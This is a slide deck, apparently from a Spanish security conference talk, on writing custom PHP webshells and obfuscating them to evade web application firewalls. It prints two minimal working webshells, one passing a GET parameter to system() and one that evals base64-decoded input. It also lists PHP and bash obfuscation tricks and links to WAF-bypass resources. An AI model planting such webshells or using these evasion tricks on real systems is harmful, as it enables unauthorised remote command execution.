tengo un perro que se llama waf ......jomoza@wafbypass:/home/bitup# curl “”
TRANSCRIPT
![Page 1: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/1.jpg)
TENGO UN PERRO QUE
SE LLAMA WAF
![Page 2: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/2.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
![Page 3: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/3.jpg)
jomoza@wafbypass:/home/bitup# whoami
Josep Moreno (JoMoZa)[email protected]/loveisinthenet[*] loveisinthe.net
@bitupalicante [*] bitupalicante.com
![Page 4: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/4.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
Webshell uploaded...
![Page 5: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/5.jpg)
5 MINS AFTER...
![Page 6: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/6.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
404
![Page 7: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/7.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
If you ask about public webshells...
- Can include bad thinks
(minners, ...)
- Can include obfuscated
functions
(Functionalityless)
- IDS/WAF Detection
![Page 8: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/8.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
Make your own webshell and 4 that...
![Page 9: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/9.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
let’s talk about ofuscation php , vulnerable
functions and some bash tricks..
![Page 10: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/10.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
IT’S A BIND SHELL
![Page 11: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/11.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
IT’S A BIND SHELL
Apache, NGINX, Tomcat….Firefox, Chrome,....
![Page 12: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/12.jpg)
webshells...<?php
echo system($_GET[“cmd”]);?>
RCE
![Page 13: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/13.jpg)
<?phpecho system($_GET[“cmd”]);
?>
RCE:
# Remote CODE Execution
(Application context: “asp, jsp, php... functions)
webshells...
![Page 14: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/14.jpg)
<?phpecho system($_GET[“cmd”]);
?>
RCE:
# Remote CODE Execution
(Application context: “asp, jsp, php... functions)
# Remote COMMAND Execution
(System context: “bash, sh, cmd,...”)
webshells...
![Page 15: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/15.jpg)
jomoza@wafbypass:/home/bitup# php -c rce
https://stackoverflow.com/questions/3115559/exploitable-php-functions
![Page 16: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/16.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
🖥
![Page 17: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/17.jpg)
LeT’s OfUsCaTe
SyStEm() FuN
![Page 18: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/18.jpg)
jomoza@wafbypass:/home/bitup# fileless like webshell
![Page 19: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/19.jpg)
jomoza@wafbypass:/home/bitup#./makeitcool “system()”
PONER COMENTARIOS Y HEX
http://php.net/manual/en/functions.variable-functions.php
https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/
CONCATENATED STRING
USING DEFINED FUNCTIONS
/*SINGLE STRING CHARACTER*/
https://secure.php.net/manual/es/language.operators.string.php
![Page 20: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/20.jpg)
APPLICATION
CONTEXT.
![Page 21: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/21.jpg)
jomoza@wafbypass:/home/bitup# php “<?php rce; ?>”https://stackoverflow.com/questions/3115559/exploitable-php-functions
![Page 23: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/23.jpg)
FILELESS ARE YOU?
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
![Page 24: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/24.jpg)
jomoza@wafbypass:/home/bitup# fileless like webshell
<?php eval(base64_decode($_GET["bcode"]));
?>
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
FILELESS ARE YOU?
![Page 25: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/25.jpg)
jomoza@wafbypass:/home/bitup# fileless like webshell
![Page 26: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/26.jpg)
jomoza@wafbypass:/home/bitup# fileless like webshell
#2
![Page 27: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/27.jpg)
SYSTEM
CONTEXT.
![Page 28: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/28.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
![Page 29: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/29.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
![Page 30: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/30.jpg)
jomoza@wafbypass:/home/bitup# cat talk | more
DEMO #3
![Page 31: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/31.jpg)
jomoza@wafbypass:/home/bitup# bash globbing
![Page 32: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/32.jpg)
$ php -r 'echo "hello"." world"."\n";'
hello world
jomoza@wafbypass:/home/bitup# string literal concatenationhttps://unix.stackexchange.com/questions/10263/how-to-concatenate-string-variables-into-a-third
![Page 33: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/33.jpg)
jomoza@wafbypass:/home/bitup# undefined variableshttps://www.secjuice.com/web-application-firewall-waf-evasion/
![Page 34: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/34.jpg)
jomoza@wafbypass:/home/bitup# ./metamorphws start
![Page 35: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/35.jpg)
jomoza@wafbypass:/home/bitup# curl “http://bibliography”
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0https://www.secjuice.com/web-application-firewall-waf-evasion/https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/
https://github.com/lcatro/PHP-WebShell-Bypass-WAFhttps://github.com/PortSwigger/bypass-wafhttps://stackoverflow.com/questions/3115559/exploitable-php-functionshttps://es.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
![Page 36: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/36.jpg)
![Page 37: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/37.jpg)
@j0moz4
@bitupalicante
![Page 38: TENGO UN PERRO QUE SE LLAMA WAF ......jomoza@wafbypass:/home/bitup# curl “”](https://reader030.vdocuments.net/reader030/viewer/2022041111/5f10c4d77e708231d44aba27/html5/thumbnails/38.jpg)